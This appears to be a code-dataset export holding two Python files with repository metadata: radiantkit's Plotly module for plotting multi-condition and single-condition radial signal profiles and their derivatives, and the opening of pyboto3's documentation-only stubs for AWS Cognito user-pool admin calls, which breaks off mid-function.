| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ef630020da2b1a69b857e6213862ac955421138e
| 26,619
|
py
|
Python
|
radiantkit/plot.py
|
ggirelli/radiantkit
|
df3e57dbcda902f4f7b3796e6b8dbbf623ee36b8
|
[
"MIT"
] | 2
|
2021-03-03T09:19:25.000Z
|
2022-03-23T10:24:47.000Z
|
radiantkit/plot.py
|
ggirelli/radiantkit
|
df3e57dbcda902f4f7b3796e6b8dbbf623ee36b8
|
[
"MIT"
] | 122
|
2020-10-05T06:19:09.000Z
|
2022-02-04T18:26:20.000Z
|
radiantkit/plot.py
|
ggirelli/radiantkit
|
df3e57dbcda902f4f7b3796e6b8dbbf623ee36b8
|
[
"MIT"
] | null | null | null |
"""
@author: Gabriele Girelli
@contact: gigi.ga90@gmail.com
"""
from collections import defaultdict
import numpy as np # type: ignore
import os
import pandas as pd # type: ignore
import plotly.graph_objects as go # type: ignore
import plotly.express as px # type: ignore
from plotly.subplots import make_subplots # type: ignore
from radiantkit import distance, report, stat
from typing import Any, DefaultDict, Dict, List, Optional, Tuple
def get_axis_label(axis: str, aid: int) -> str:
return f"{axis}{aid+1}" if aid > 0 else axis
def get_axis_range(
trace_list: List[go.Figure], axis_type: str, axis_label: str
) -> Tuple[float, float]:
return (
np.min(
[
trace[axis_type].min()
for trace in trace_list
if axis_label == trace[f"{axis_type}axis"]
]
),
np.max(
[
trace[axis_type].max()
for trace in trace_list
if axis_label == trace[f"{axis_type}axis"]
]
),
)
def add_derivative_xaxis_to_profiles(fig: go.Figure) -> go.Figure:
fig.add_shape(
type="line",
x0=0,
x1=1,
y0=0,
y1=0,
xsizemode="scaled",
ysizemode="scaled",
line_color="#969696",
xref="x",
yref="y2",
line_dash="dash",
)
fig.add_shape(
type="line",
x0=0,
x1=1,
y0=0,
y1=0,
xsizemode="scaled",
ysizemode="scaled",
line_color="#969696",
xref="x",
yref="y3",
line_dash="dash",
)
return fig
def add_line_trace(
fig: go.Figure,
x0: Optional[np.ndarray],
x1: Optional[np.ndarray],
y0: Optional[np.ndarray],
y1: Optional[np.ndarray],
line_color: str = "#969696",
**kwargs,
) -> go.Figure:
fig.add_trace(
go.Scatter(
x=[x0, x1],
y=[y0, y1],
mode="lines",
line_color=line_color,
**kwargs,
)
)
return fig
class ProfileMultiConditionNorm(object):
html_class: str = "plot-multi-condition-normalized"
_stub: str
def __init__(self, stub: str):
super(ProfileMultiConditionNorm, self).__init__()
self._stub = stub
def __make_scatter_trace(
self,
channel_data: pd.DataFrame,
pfit: Dict[str, Dict[str, Any]],
) -> go.Scatter:
condition_list: List[str] = sorted(list(set(channel_data["condition"])))
panel_data = []
for condition_idx in range(len(condition_list)):
condition_lab = condition_list[condition_idx]
condition_data = channel_data.loc[
condition_lab == channel_data["condition"], :
]
assert condition_lab in pfit
assert "pfit" in pfit[condition_lab]
x, y = pfit[condition_lab]["pfit"].linspace(200)
xx, yy = pfit[condition_lab]["pfit"].deriv().linspace(200)
xxx, yyy = pfit[condition_lab]["pfit"].deriv().deriv().linspace(200)
stat_lab = pfit[condition_lab]["stat"].value
panel_data.extend(
[
go.Scatter(
name=f"{condition_lab}_{stat_lab}_raw",
xaxis="x",
yaxis=get_axis_label("y", condition_idx),
x=condition_data["x"],
y=condition_data[f"{stat_lab}_raw"],
mode="markers",
legendgroup=condition_lab,
marker=dict(
size=4,
opacity=0.5,
color=px.colors.qualitative.Pastel2[condition_idx],
),
showlegend=False,
),
go.Scatter(
name=f"{condition_lab}_{stat_lab}",
x=x,
y=y,
xaxis="x",
yaxis=get_axis_label("y", condition_idx),
mode="lines",
legendgroup=condition_lab,
line_color=px.colors.qualitative.Dark2[condition_idx],
),
]
)
return panel_data
def __add_der_zeros(
self, fig: go.Figure, pfit_data: Dict[str, Dict[str, Any]]
) -> go.Figure:
pfit_sorted = sorted(pfit_data.items(), key=lambda x: x[0])
for pfit_idx in range(len(pfit_sorted)):
condition_lab, pfit = pfit_sorted[pfit_idx]
der_roots = stat.get_radial_profile_roots(pfit["pfit"])
for rid in range(len(der_roots)):
if np.isnan(der_roots[rid]):
continue
pid = 0
panel_trace_y = np.concatenate(
[
p["y"]
for p in fig["data"]
if p["yaxis"] == get_axis_label("y", pid)
]
)
fig = add_line_trace(
fig,
der_roots[rid],
der_roots[rid],
panel_trace_y.min(),
panel_trace_y.max(),
line_dash="dot" if rid == 1 else "dash",
line_color=px.colors.qualitative.Set2[pfit_idx],
legendgroup=condition_lab,
showlegend=False,
xaxis="x",
yaxis=get_axis_label("y", pid),
)
return fig
def __secondary_yaxes_props(
self, pfit_data: Dict[str, List[Dict[str, Any]]]
) -> Dict[str, Any]:
yaxes_props: Dict[str, Any] = {}
for ii in range(1, len(pfit_data)):
yaxes_props[get_axis_label("yaxis", ii)] = dict(
domain=[0, 1],
side="left",
showgrid=False,
zeroline=False,
visible=False,
)
if "y" != get_axis_label("y", ii):
yaxes_props[get_axis_label("yaxis", ii)]["overlaying"] = "y"
return yaxes_props
def __make_panel(
self,
data: pd.DataFrame,
pfit_data: Dict[str, List[Dict[str, Any]]],
stat_type: stat.ProfileStatType,
dtype: distance.DistanceType,
) -> go.Figure:
channel_lab = data["channel"].tolist()[0]
selected_pfits: Dict[str, Dict[str, Any]] = {}
for condition_lab, pfit_list in pfit_data.items():
for pfit in pfit_list:
condition = pfit["stat"] == stat_type
condition = condition and pfit["distance_type"] == dtype.value
condition = condition and pfit["cname"] == channel_lab
if condition:
selected_pfits[
os.path.basename(os.path.dirname(condition_lab))
] = pfit
fig = make_subplots(specs=[[{"secondary_y": True}]])
plot_data = self.__make_scatter_trace(
data,
selected_pfits,
)
for panel in plot_data:
fig.add_trace(panel)
fig = self.__add_der_zeros(fig, selected_pfits)
fig.update_layout(
template="plotly_dark",
title=f"""Signal profile (y-axis not comparable across curves)<br>
<sub>Channel: {channel_lab}; Stat: {stat_type.value}</sub>""".replace(
f"\n{' '*4*3}", "\n"
),
xaxis=dict(title=dtype.label, anchor="y"),
yaxis=dict(
showgrid=True,
zeroline=False,
visible=False,
),
**self.__secondary_yaxes_props(pfit_data),
autosize=False,
width=1000,
height=500,
)
return fig
def _plot(
self, data: DefaultDict[str, Dict[str, pd.DataFrame]], *args, **kwargs
) -> DefaultDict[str, Dict[str, go.Figure]]:
distance_type = distance.DistanceType.LAMINA_NORM
fig_data: DefaultDict[str, Dict[str, go.Figure]] = defaultdict(lambda: {})
assert "raw_data" in data
assert "poly_fit" in data
condition_data = []
for dirpath, dirdata in data["raw_data"].items():
assert isinstance(dirdata, pd.DataFrame)
assert dirpath in data["poly_fit"]
condition_lab = os.path.basename(os.path.dirname(dirpath))
distdata = dirdata.loc[
distance_type.value == dirdata["distance_type"], :
].copy()
distdata["condition"] = condition_lab
condition_data.append(distdata)
plottable_data = pd.concat(condition_data)
for channel_lab in list(set(plottable_data["channel"])):
channel_data = plottable_data.loc[
channel_lab == plottable_data["channel"], :
]
for stat_type in stat.ProfileStatType:
fig_data[self._stub][
f"{channel_lab}-{stat_type.value}"
] = self.__make_panel(
channel_data,
data["poly_fit"],
stat_type,
distance_type,
)
return fig_data
def make(
self, output_data: DefaultDict[str, Dict[str, Any]]
) -> Tuple[str, List[str]]:
fig_data = self._plot(output_data)
panels = "\n\t".join(
[
report.ReportBase.figure_to_html(
fig,
classes=[self._stub, f"{self.html_class}-panel", "hidden"],
data=dict(condition=os.path.basename(dpath)),
)
for dpath, fig in sorted(
fig_data[self._stub].items(), key=lambda x: x[0]
)
]
)
return (panels, sorted(fig_data[self._stub].keys()))
class ProfileMultiCondition(object):
html_class: str = "plot-multi-condition"
_stub: str
def __init__(self, stub: str):
super(ProfileMultiCondition, self).__init__()
self._stub = stub
def __make_scatter_trace(
self,
channel_data: pd.DataFrame,
pfit: Dict[str, Dict[str, Any]],
) -> go.Scatter:
condition_list: List[str] = sorted(list(set(channel_data["condition"])))
panel_data = []
for condition_idx in range(len(condition_list)):
condition_lab = condition_list[condition_idx]
condition_data = channel_data.loc[
condition_lab == channel_data["condition"], :
]
assert condition_lab in pfit
assert "pfit" in pfit[condition_lab]
x, y = pfit[condition_lab]["pfit"].linspace(200)
xx, yy = pfit[condition_lab]["pfit"].deriv().linspace(200)
xxx, yyy = pfit[condition_lab]["pfit"].deriv().deriv().linspace(200)
stat_lab = pfit[condition_lab]["stat"].value
panel_data.extend(
[
go.Scatter(
name=f"{condition_lab}_{stat_lab}_raw",
xaxis="x",
yaxis="y",
x=condition_data["x"],
y=condition_data[f"{stat_lab}_raw"],
mode="markers",
legendgroup=condition_lab,
marker=dict(
size=4,
opacity=0.5,
color=px.colors.qualitative.Pastel2[condition_idx],
),
showlegend=False,
),
go.Scatter(
name=f"{condition_lab}_{stat_lab}",
x=x,
y=y,
xaxis="x",
yaxis="y",
mode="lines",
legendgroup=condition_lab,
line_color=px.colors.qualitative.Dark2[condition_idx],
),
go.Scatter(
name=f"{condition_lab}_{stat_lab}_der1",
x=xx,
y=yy,
xaxis="x",
yaxis="y2",
mode="lines",
legendgroup=condition_lab,
showlegend=False,
line_color=px.colors.qualitative.Dark2[condition_idx],
),
go.Scatter(
name=f"{condition_lab}_{stat_lab}_der2",
x=xxx,
y=yyy,
xaxis="x",
yaxis="y3",
mode="lines",
legendgroup=condition_lab,
showlegend=False,
line_color=px.colors.qualitative.Dark2[condition_idx],
),
]
)
return panel_data
def __add_der_zeros(
self, fig: go.Figure, pfit_data: Dict[str, Dict[str, Any]]
) -> go.Figure:
pfit_sorted = sorted(pfit_data.items(), key=lambda x: x[0])
for pfit_idx in range(len(pfit_sorted)):
condition_lab, pfit = pfit_sorted[pfit_idx]
der_roots = stat.get_radial_profile_roots(pfit["pfit"])
for rid in range(len(der_roots)):
if np.isnan(der_roots[rid]):
continue
for pid in range(min(rid + 2, 3)):
panel_trace_y = np.concatenate(
[
p["y"]
for p in fig["data"]
if p["yaxis"] == get_axis_label("y", pid)
]
)
fig = add_line_trace(
fig,
der_roots[rid],
der_roots[rid],
panel_trace_y.min(),
panel_trace_y.max(),
line_dash="dot" if rid == 1 else "dash",
line_color=px.colors.qualitative.Set2[pfit_idx],
legendgroup=condition_lab,
showlegend=False,
xaxis="x",
yaxis=get_axis_label("y", pid),
)
return fig
def __make_panel(
self,
data: pd.DataFrame,
pfit_data: Dict[str, List[Dict[str, Any]]],
stat_type: stat.ProfileStatType,
dtype: distance.DistanceType,
) -> go.Figure:
channel_lab = data["channel"].tolist()[0]
selected_pfits: Dict[str, Dict[str, Any]] = {}
for condition_lab, pfit_list in pfit_data.items():
for pfit in pfit_list:
condition = pfit["stat"] == stat_type
condition = condition and pfit["distance_type"] == dtype.value
condition = condition and pfit["cname"] == channel_lab
if condition:
selected_pfits[
os.path.basename(os.path.dirname(condition_lab))
] = pfit
fig = make_subplots(rows=3, cols=1)
plot_data = self.__make_scatter_trace(
data,
selected_pfits,
)
for panel in plot_data:
fig.add_trace(panel)
fig = add_derivative_xaxis_to_profiles(fig)
fig = self.__add_der_zeros(fig, selected_pfits)
yranges = dict(
y=get_axis_range(plot_data, "y", "y"),
y2=get_axis_range(plot_data, "y", "y2"),
y3=get_axis_range(plot_data, "y", "y3"),
)
fig.update_layout(
template="plotly_dark",
title=f"""Signal profile<br>
<sub>Channel: {channel_lab}; Stat: {stat_type.value}</sub>""".replace(
f"\n{' '*4*3}", "\n"
),
xaxis=dict(title=dtype.label, anchor="y3"),
yaxis=dict(
domain=[0.66, 1],
range=yranges["y"],
title="Intensity (a.u.)",
),
yaxis2=dict(
domain=[0.33, 0.63],
range=yranges["y2"],
title="1st Derivative Intensity (a.u.)",
),
yaxis3=dict(
domain=[0, 0.30],
range=yranges["y3"],
title="2nd Derivative Intensity (a.u.)",
),
autosize=False,
width=1000,
height=1000,
)
return fig
def _plot(
self, data: DefaultDict[str, Dict[str, pd.DataFrame]], *args, **kwargs
) -> DefaultDict[str, Dict[str, go.Figure]]:
distance_type = distance.DistanceType.LAMINA_NORM
fig_data: DefaultDict[str, Dict[str, go.Figure]] = defaultdict(lambda: {})
assert "raw_data" in data
assert "poly_fit" in data
condition_data = []
for dirpath, dirdata in data["raw_data"].items():
assert isinstance(dirdata, pd.DataFrame)
assert dirpath in data["poly_fit"]
condition_lab = os.path.basename(os.path.dirname(dirpath))
distdata = dirdata.loc[
distance_type.value == dirdata["distance_type"], :
].copy()
distdata["condition"] = condition_lab
condition_data.append(distdata)
plottable_data = pd.concat(condition_data)
for channel_lab in list(set(plottable_data["channel"])):
channel_data = plottable_data.loc[
channel_lab == plottable_data["channel"], :
]
for stat_type in stat.ProfileStatType:
fig_data[self._stub][
f"{channel_lab}-{stat_type.value}"
] = self.__make_panel(
channel_data,
data["poly_fit"],
stat_type,
distance_type,
)
return fig_data
def make(
self, output_data: DefaultDict[str, Dict[str, Any]]
) -> Tuple[str, List[str]]:
fig_data = self._plot(output_data)
panels = "\n\t".join(
[
report.ReportBase.figure_to_html(
fig,
classes=[self._stub, f"{self.html_class}-panel", "hidden"],
data=dict(condition=os.path.basename(dpath)),
)
for dpath, fig in sorted(
fig_data[self._stub].items(), key=lambda x: x[0]
)
]
)
return (panels, sorted(fig_data[self._stub].keys()))
class ProfileSingleCondition(object):
html_class: str = "plot-single-condition"
_stub: str
def __init__(self, stub: str):
super(ProfileSingleCondition, self).__init__()
self._stub = stub
def __make_scatter_trace(
self,
name: str,
data: pd.DataFrame,
pfit_data: List[Dict[str, Any]],
) -> go.Scatter:
panel_data = []
for stat_type in stat.ProfileStatType:
pfit = [x for x in pfit_data if x["stat"] == stat_type]
assert 1 == len(pfit), pfit
assert "pfit" in pfit[0]
x, y = pfit[0]["pfit"].linspace(200)
xx, yy = pfit[0]["pfit"].deriv().linspace(200)
xxx, yyy = pfit[0]["pfit"].deriv().deriv().linspace(200)
panel_data.extend(
[
go.Scatter(
name=f"{name}_{stat_type.value}_raw",
xaxis="x",
yaxis="y",
x=data["x"],
y=data[f"{stat_type.value}_raw"],
mode="markers",
legendgroup=stat_type.value,
marker=dict(
size=4,
opacity=0.5,
color=px.colors.qualitative.Pastel2[stat_type.id],
),
showlegend=False,
),
go.Scatter(
name=f"{name}_{stat_type.value}",
x=x,
y=y,
xaxis="x",
yaxis="y",
mode="lines",
legendgroup=stat_type.value,
line_color=px.colors.qualitative.Dark2[stat_type.id],
),
go.Scatter(
name=f"{name}_{stat_type.value}_der1",
x=xx,
y=yy,
xaxis="x",
yaxis="y2",
mode="lines",
legendgroup=stat_type.value,
showlegend=False,
line_color=px.colors.qualitative.Dark2[stat_type.id],
),
go.Scatter(
name=f"{name}_{stat_type.value}_der2",
x=xxx,
y=yyy,
xaxis="x",
yaxis="y3",
mode="lines",
legendgroup=stat_type.value,
showlegend=False,
line_color=px.colors.qualitative.Dark2[stat_type.id],
),
]
)
return panel_data
def __add_der_zeros(
self, fig: go.Figure, pfit_data: List[Dict[str, Any]]
) -> go.Figure:
for pfit in pfit_data:
der_roots = stat.get_radial_profile_roots(pfit["pfit"])
for rid in range(len(der_roots)):
if np.isnan(der_roots[rid]):
continue
for pid in range(min(rid + 2, 3)):
panel_trace_y = np.concatenate(
[
p["y"]
for p in fig["data"]
if p["yaxis"] == get_axis_label("y", pid)
]
)
fig = add_line_trace(
fig,
der_roots[rid],
der_roots[rid],
panel_trace_y.min(),
panel_trace_y.max(),
line_dash="dot" if rid == 1 else "dash",
line_color=px.colors.qualitative.Set2[pfit["stat"].id],
legendgroup=pfit["stat"].value,
showlegend=False,
xaxis="x",
yaxis=get_axis_label("y", pid),
)
return fig
def __make_panel(
self,
data: pd.DataFrame,
pfit_data: List[Dict[str, Any]],
condition_lab: str,
channel_lab: str,
dtype: distance.DistanceType,
) -> go.Figure:
pfit = [
x
for x in pfit_data
if x["cname"] == channel_lab and x["distance_type"] == dtype.value
]
fig = make_subplots(rows=3, cols=1)
plot_data = self.__make_scatter_trace(
channel_lab,
data.loc[channel_lab == data["channel"]],
pfit,
)
for panel in plot_data:
fig.add_trace(panel)
fig = add_derivative_xaxis_to_profiles(fig)
fig = self.__add_der_zeros(fig, pfit)
yranges = dict(
y=get_axis_range(plot_data, "y", "y"),
y2=get_axis_range(plot_data, "y", "y2"),
y3=get_axis_range(plot_data, "y", "y3"),
)
fig.update_layout(
template="plotly_dark",
title=f"""Signal profile<br>
<sub>Condition: {condition_lab}; Channel: {channel_lab}</sub>""".replace(
f"\n{' '*4*3}", "\n"
),
xaxis=dict(title=dtype.label, anchor="y3"),
yaxis=dict(
domain=[0.66, 1],
range=yranges["y"],
title="Intensity (a.u.)",
),
yaxis2=dict(
domain=[0.33, 0.63],
range=yranges["y2"],
title="1st Derivative Intensity (a.u.)",
),
yaxis3=dict(
domain=[0, 0.30],
range=yranges["y3"],
title="2nd Derivative Intensity (a.u.)",
),
autosize=False,
width=1000,
height=1000,
)
return fig
def _plot(
self, data: DefaultDict[str, Dict[str, pd.DataFrame]], *args, **kwargs
) -> DefaultDict[str, Dict[str, go.Figure]]:
fig_data: DefaultDict[str, Dict[str, go.Figure]] = defaultdict(lambda: {})
assert "raw_data" in data
assert "poly_fit" in data
for dirpath, dirdata in data["raw_data"].items():
assert isinstance(dirdata, pd.DataFrame)
assert dirpath in data["poly_fit"]
condition_lab = os.path.basename(os.path.dirname(dirpath))
distance_type = distance.DistanceType.LAMINA_NORM
for channel_lab in set(dirdata["channel"]):
distdata = dirdata.loc[distance_type.value == dirdata["distance_type"]]
if 0 == distdata.shape[0]:
continue
fig_data[self._stub][
f"{channel_lab}-{condition_lab}"
] = self.__make_panel(
distdata,
data["poly_fit"][dirpath],
condition_lab,
channel_lab,
distance_type,
)
return fig_data
def make(
self, output_data: DefaultDict[str, Dict[str, Any]]
) -> Tuple[str, List[str]]:
fig_data = self._plot(output_data)
panels = "\n\t".join(
[
report.ReportBase.figure_to_html(
fig,
classes=[self._stub, f"{self.html_class}-panel", "hidden"],
data=dict(condition=os.path.basename(dpath)),
)
for dpath, fig in sorted(
fig_data[self._stub].items(), key=lambda x: x[0]
)
]
)
return (panels, sorted(fig_data[self._stub].keys()))
| 35.730201
| 87
| 0.468838
| 2,686
| 26,619
| 4.431124
| 0.089725
| 0.045371
| 0.015124
| 0.026214
| 0.856327
| 0.84448
| 0.829945
| 0.8123
| 0.798437
| 0.775164
| 0
| 0.013782
| 0.4194
| 26,619
| 744
| 88
| 35.778226
| 0.756325
| 0.004546
| 0
| 0.766764
| 0
| 0
| 0.070566
| 0.021257
| 0
| 0
| 0
| 0
| 0.026239
| 1
| 0.033528
| false
| 0
| 0.01312
| 0.002915
| 0.088921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
32986d45a002b327f9d0c84a98fb3f9531babe0f
| 137,699
|
py
|
Python
|
pyboto3/cognitoidentityprovider.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/cognitoidentityprovider.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/cognitoidentityprovider.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_custom_attributes(UserPoolId=None, CustomAttributes=None):
"""
Adds additional user attributes to the user pool schema.
See also: AWS API Documentation
:example: response = client.add_custom_attributes(
UserPoolId='string',
CustomAttributes=[
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
]
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to add custom attributes.
:type CustomAttributes: list
:param CustomAttributes: [REQUIRED]
An array of custom attributes, such as Mutable and Name.
(dict) --Contains information about the schema attribute.
Name (string) --A schema attribute of the name type.
AttributeDataType (string) --The attribute data type.
DeveloperOnlyAttribute (boolean) --Specifies whether the attribute type is developer only.
Mutable (boolean) --Specifies whether the attribute can be changed once it has been created.
Required (boolean) --Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
NumberAttributeConstraints (dict) --Specifies the constraints for an attribute of the number type.
MinValue (string) --The minimum value of an attribute that is of the number data type.
MaxValue (string) --The maximum value of an attribute that is of the number data type.
StringAttributeConstraints (dict) --Specifies the constraints for an attribute of the string type.
MinLength (string) --The minimum length of an attribute value of the string type.
MaxLength (string) --The maximum length of an attribute value of the string type.
:rtype: dict
:return: {}
"""
pass
def admin_add_user_to_group(UserPoolId=None, Username=None, GroupName=None):
"""
Adds the specified user to the specified group.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_add_user_to_group(
UserPoolId='string',
Username='string',
GroupName='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:type Username: string
:param Username: [REQUIRED]
The username for the user.
:type GroupName: string
:param GroupName: [REQUIRED]
The group name.
"""
pass
def admin_confirm_sign_up(UserPoolId=None, Username=None):
"""
Confirms user registration as an admin without using a confirmation code. Works on any user.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_confirm_sign_up(
UserPoolId='string',
Username='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for which you want to confirm user registration.
:type Username: string
:param Username: [REQUIRED]
The user name for which you want to confirm user registration.
:rtype: dict
:return: {}
"""
pass
def admin_create_user(UserPoolId=None, Username=None, UserAttributes=None, ValidationData=None, TemporaryPassword=None, ForceAliasCreation=None, MessageAction=None, DesiredDeliveryMediums=None):
"""
Creates a new user in the specified user pool and sends a welcome message via email or phone (SMS). This message is based on a template that you configured in your call to CreateUserPool or UpdateUserPool . This template includes your custom sign-up instructions and placeholders for user name and temporary password.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_create_user(
UserPoolId='string',
Username='string',
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
],
ValidationData=[
{
'Name': 'string',
'Value': 'string'
},
],
TemporaryPassword='string',
ForceAliasCreation=True|False,
MessageAction='RESEND'|'SUPPRESS',
DesiredDeliveryMediums=[
'SMS'|'EMAIL',
]
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where the user will be created.
:type Username: string
:param Username: [REQUIRED]
The username for the user. Must be unique within the user pool. Must be a UTF-8 string between 1 and 128 characters. After the user is created, the username cannot be changed.
:type UserAttributes: list
:param UserAttributes: An array of name-value pairs that contain user attributes and attribute values to be set for the user to be created. You can create a user without specifying any attributes other than Username . However, any attributes that you specify as required (in CreateUserPool or in the Attributes tab of the console) must be supplied either by you (in your call to AdminCreateUser ) or by the user (when he or she signs up in response to your welcome message).
For custom attributes, you must prepend the custom: prefix to the attribute name.
To send a message inviting the user to sign up, you must specify the user's email address or phone number. This can be done in your call to AdminCreateUser or in the Users tab of the Amazon Cognito console for managing your user pools.
In your call to AdminCreateUser , you can set the email_verified attribute to True , and you can set the phone_number_verified attribute to True . (You can also do this by calling AdminUpdateUserAttributes .)
email : The email address of the user to whom the message that contains the code and username will be sent. Required if the email_verified attribute is set to True , or if 'EMAIL' is specified in the DesiredDeliveryMediums parameter.
phone_number : The phone number of the user to whom the message that contains the code and username will be sent. Required if the phone_number_verified attribute is set to True , or if 'SMS' is specified in the DesiredDeliveryMediums parameter.
(dict) --Specifies whether the attribute is standard or custom.
Name (string) -- [REQUIRED]The name of the attribute.
Value (string) --The value of the attribute.
:type ValidationData: list
:param ValidationData: The user's validation data. This is an array of name-value pairs that contain user attributes and attribute values that you can use for custom validation, such as restricting the types of user accounts that can be registered. For example, you might choose to allow or disallow user sign-up based on the user's domain.
To configure custom validation, you must create a Pre Sign-up Lambda trigger for the user pool as described in the Amazon Cognito Developer Guide. The Lambda trigger receives the validation data and uses it in the validation process.
The user's validation data is not persisted.
(dict) --Specifies whether the attribute is standard or custom.
Name (string) -- [REQUIRED]The name of the attribute.
Value (string) --The value of the attribute.
:type TemporaryPassword: string
:param TemporaryPassword: The user's temporary password. This password must conform to the password policy that you specified when you created the user pool.
The temporary password is valid only once. To complete the Admin Create User flow, the user must enter the temporary password in the sign-in page along with a new password to be used in all future sign-ins.
This parameter is not required. If you do not specify a value, Amazon Cognito generates one for you.
The temporary password can only be used until the user account expiration limit that you specified when you created the user pool. To reset the account after that time limit, you must call AdminCreateUser again, specifying 'RESEND' for the MessageAction parameter.
:type ForceAliasCreation: boolean
:param ForceAliasCreation: This parameter is only used if the phone_number_verified or email_verified attribute is set to True . Otherwise, it is ignored.
If this parameter is set to True and the phone number or email address specified in the UserAttributes parameter already exists as an alias with a different user, the API call will migrate the alias from the previous user to the newly created user. The previous user will no longer be able to log in using that alias.
If this parameter is set to False , the API throws an AliasExistsException error if the alias already exists. The default value is False .
:type MessageAction: string
:param MessageAction: Set to 'RESEND' to resend the invitation message to a user that already exists and reset the expiration limit on the user's account. Set to 'SUPPRESS' to suppress sending the message. Only one value can be specified.
:type DesiredDeliveryMediums: list
:param DesiredDeliveryMediums: Specify 'EMAIL' if email will be used to send the welcome message. Specify 'SMS' if the phone number will be used. The default value is 'SMS' . More than one value can be specified.
(string) --
:rtype: dict
:return: {
'User': {
'Username': 'string',
'Attributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'UserCreateDate': datetime(2015, 1, 1),
'UserLastModifiedDate': datetime(2015, 1, 1),
'Enabled': True|False,
'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
}
}
:returns:
UNCONFIRMED - User has been created but not confirmed.
CONFIRMED - User has been confirmed.
ARCHIVED - User is no longer active.
COMPROMISED - User is disabled due to a potential security threat.
UNKNOWN - User status is not known.
"""
pass
def admin_delete_user(UserPoolId=None, Username=None):
"""
Deletes a user as an administrator. Works on any user.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_delete_user(
UserPoolId='string',
Username='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to delete the user.
:type Username: string
:param Username: [REQUIRED]
The user name of the user you wish to delete.
"""
pass
def admin_delete_user_attributes(UserPoolId=None, Username=None, UserAttributeNames=None):
"""
Deletes the user attributes in a user pool as an administrator. Works on any user.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_delete_user_attributes(
UserPoolId='string',
Username='string',
UserAttributeNames=[
'string',
]
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to delete user attributes.
:type Username: string
:param Username: [REQUIRED]
The user name of the user from which you would like to delete attributes.
:type UserAttributeNames: list
:param UserAttributeNames: [REQUIRED]
An array of strings representing the user attribute names you wish to delete.
For custom attributes, you must prepend the custom: prefix to the attribute name.
(string) --
:rtype: dict
:return: {}
"""
pass
def admin_disable_user(UserPoolId=None, Username=None):
"""
Disables the specified user as an administrator. Works on any user.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_disable_user(
UserPoolId='string',
Username='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to disable the user.
:type Username: string
:param Username: [REQUIRED]
The user name of the user you wish to disable.
:rtype: dict
:return: {}
"""
pass
def admin_enable_user(UserPoolId=None, Username=None):
"""
Enables the specified user as an administrator. Works on any user.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_enable_user(
UserPoolId='string',
Username='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to enable the user.
:type Username: string
:param Username: [REQUIRED]
The user name of the user you wish to enable.
:rtype: dict
:return: {}
"""
pass
def admin_forget_device(UserPoolId=None, Username=None, DeviceKey=None):
"""
Forgets the device, as an administrator.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_forget_device(
UserPoolId='string',
Username='string',
DeviceKey='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
